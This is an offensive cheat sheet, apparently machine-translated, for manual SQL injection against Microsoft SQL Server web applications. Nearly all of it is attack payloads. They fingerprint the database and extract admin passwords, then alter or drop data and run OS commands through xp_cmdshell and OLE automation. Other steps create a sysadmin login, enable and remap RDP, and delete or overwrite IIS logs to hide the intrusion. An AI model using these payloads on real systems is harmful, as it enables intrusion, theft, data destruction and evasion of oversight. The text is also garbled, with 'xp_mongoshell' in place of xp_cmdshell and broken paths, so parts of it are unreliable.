Manual MSSQL injection of common SQL statements

And exists (select * from sysobjects) // you can check whether it is MSSQL.

And exists (select * from tableName) // determines whether a table exists. tableName indicates the table name.

And 1 = (select @ VERSION) // MSSQL VERSION

And 1 = (select db_name () // Current Database Name

And 1 = (select @ servername) // local service name

And 1 = (select IS_SRVROLEMEMBER (sysadmin) // determine whether the system administrator is

And 1 = (Select IS_MEMBER (db_owner) // determine whether the database permission is used

And 1 = (Select HAS_DBACCESS (master) // checks whether the database has read permission.

And 1 = (select name from master. dbo. sysdatabases where dbid = 1) // storm database name DBID is 1, 2, 3 ....

; Declare @ d int // whether multiple rows are supported

And 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = x and name = xp_mongoshell) // determine whether xp_mongoshell exists

And 1 = (select count (*) FROM master. dbo. sysobjects where name = xp_regread) // check whether the XP_regread extended stored procedure has been deleted

User test who adds and deletes a SA permission: (the SA permission is required)
Exec master. dbo. sp_addlogin test, password
Exec master. dbo. sp_addsrvrolemember test, sysadmin

Stop or activate a service. (SA permission required)
Exec master.. xp_servicecontrol stop, schedule
Exec master.. xp_servicecontrol start, schedule

Violent website directory
Create table labeng (lala nvarchar (255), id int)

DECLARE @ result varchar (255) EXEC master. dbo. xp_regread HKEY_LOCAL_MACHINE, SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots,/, @ result output insert into labeng (lala) values (@ result );

And 1 = (select top 1 lala from labeng) or and 1 = (select count (*) from labeng where lala> 1)
----------------------------------------------------- Split

Open 3389 under DOS and modify the port number
SC config termservice start = auto

Net start termservice

// Allow external connections
Reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server"/v fDenyTSConnections/t REG_DWORD/d 0x0/f

// Port 3389 to port 80
Reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"/v PortNumber/t REG_DWORD/d 80/f

 

SQL Server

Determine whether injection is allowed:

Http://www.targer.com/article.asp? Id = 6

Http://www.targer.com/article.asp? Id = 6

Http://www.targer.com/article.asp? Id = 6 and 1 = 1

Http://www.targer.com/article.asp? Id = 6 and 1 = 2

Http://www.targer.com/article.asp? Action = value and 1 = 1

Http://www.targer.com/article.asp? Action = value and 1 = 2

Searchpoints % and 1 = 1

Searchpoints % and 1 = 2

Determine the database type:

Http://www.targer.com/article.asp? Id = 6 and user> 0

Http://www.targer.com/article.asp? Id = 6 and (select count (*) from sysobjects)> 0

Query the current user data:

Article. asp? Id = 6 having 1 = 1 --

Columns in the current table:

Article. asp? Id = 6 group by admin. username having 1 = 1 --

Article. asp? Id = 6 group by admin. username, admin. password having 1 = 1 --

Arbitrary tables and columns:

And (select top 1 name from (select top N id, name from sysobjects where xtype = char (85) T order by id desc)> 1

And (select top col_name (object_id (admin), N) from sysobjects)> 1

Violent database data:

And (select top 1 password from admin where id = N)> 1

Modify data in the database:

; Update admin set password = oooooo where username = xxx

Add data in the database:

; Insert into admin values (xxx, Oooooooo )--

Delete database:

; Drop database webdata

Get the current database username: and user> 0

Get the current database name: and db_name ()> 0

Obtain the database version: and (select @ version)> 0

Determine whether multi-sentence queries are supported:; declare @ a int --

Determine whether subqueries are supported: and (select count (1) from [sysobjects])> = 0

Extended database Stored Procedure: exec master .. xp_mongoshell

View the directory of server c:; exec_master .. xp_cmdshell dir c:

Determine whether the extended stored procedure exists: and select count (*) from master. dbo. sysobjects where xtype = x and name = xp_mongoshell

Restore extended stored procedure:; exec sp_addextendedproc xp_mongoshell, xplog70.dll

Delete the extended stored procedure:; exec sp_dropextendedproc xp_mongoshell

MSSQL2000 provides some functions for indirectly obtaining permissions to access OLE objects:

; Declare @ s int

; Exec sp_oacreat wscript. shell, @ s

; Exec master .. spoamethod @s,run,null,cmd.exe/c dir c:

Determine whether the current database user name has high permissions:

And 1 = (select is_srvrolemember (sysadmin ))

And 1 = (select is_srvrolemember (serveradmin ))

And 1 = (select is_srvrolemember (setupadmin ))

And 1 = (select is_srvrolemember (securityadmin ))

And 1 = (select is_srvrolemember (diskadmin ))

And 1 = (select is_srvrolemember (bulkadmin ))

Determine whether the current database user name is DB_OWNER:

And 1 = (select is_member (db_owner ))

All database information in the SQLSERVER database system is stored in the master. dbo. sysdatabases table of SQLSERVER. You only need the PUBLIC permission to SELECT the table:

And (select top 1 name from master. dbo. sysdatabase order by dbid)> 0

And (select top 1 name from master. dbo. sysdatabase where name not in (select top 1 name from master. dbo. sysdatabases order by dbid)> 0

Delete log records:

; Exec master. dbo. xp_cmdshell del c: winntsystem32logfilesw3svc5ex070606. log> c: emp.txt

Replace log records:

; Exec master. dbo. xp_shareshell copy c: winntsystem32logfilesw3svc5ex070404. log c: winntsystem32logfilesw3svc5ex070606. log> c: emp.txt

Obtain the WEB path:

; Declare @ shell int

; Exec master .. sp_oamethod wscript. shell, @ shell out

; Exec master .. sp_oamethod @shell,run,null,cmd.exe/c dir/s d:/index. asp> c:/log.txt

Search by XP_CMDSHELL:

; Exec master .. xp_cmdshell dir/s d:/index. asp

Command for displaying server website configuration information:

Cmd/c cscript.exe c: inetpubadminscriptadsutil. vbs enum w3svc/1/root

Cmd/c cscript.exe c: inetpubadminscriptadsutil. vbs enum w3svc/2/root

Use XP_REGREAD to read data with PUBLIC permissions:

; Exec master. dbo. xp_regread

Hkey_local_machine,

Systemcurrentcontrolsetservicesw3svcparametersvirtual roots

/

For more information about the advanced technologies of SQLSERVER, see chapter 5 of proficient script hacker by Zeng yunhao.

3. DSqlHelper

Check permission SYSADMIN:

And 1 = (select IS_SRVROLEMEMBER (sysadmin ))

Serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, and db_owner.

Check XP_CMDSHELL (CMD command ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = xp_mongoshell)

Check XP_REGREAD (Registry READ function ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = xp_regread)

Check SP_MAKEWEBTASK (backup function ):

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = sp_makewebtask)

Test SP_ADDEXTENDEDPROC:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = sp_addextendedproc)

Check the XP_SUBDIRS read subdirectory:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = xp_subdirs)

Check the XP_DIRTREE read subdirectory:

And 1 = (SELECT count (*) FROM master. dbo. sysobjects WHERE name = xp_dirtree)

Modification content:

; UPDATE table name set field = content where 1 = 1

Xp_mongoshell Detection:

; Exec master .. xp_cmdshell dir c:

Fix XP_CMDSHELL:

; Exec master. dbo. sp_addextendedproc xp_mongoshell, xplog70.dll

Use XP_CMDSHELL to add a user hacker:

; Exec master. db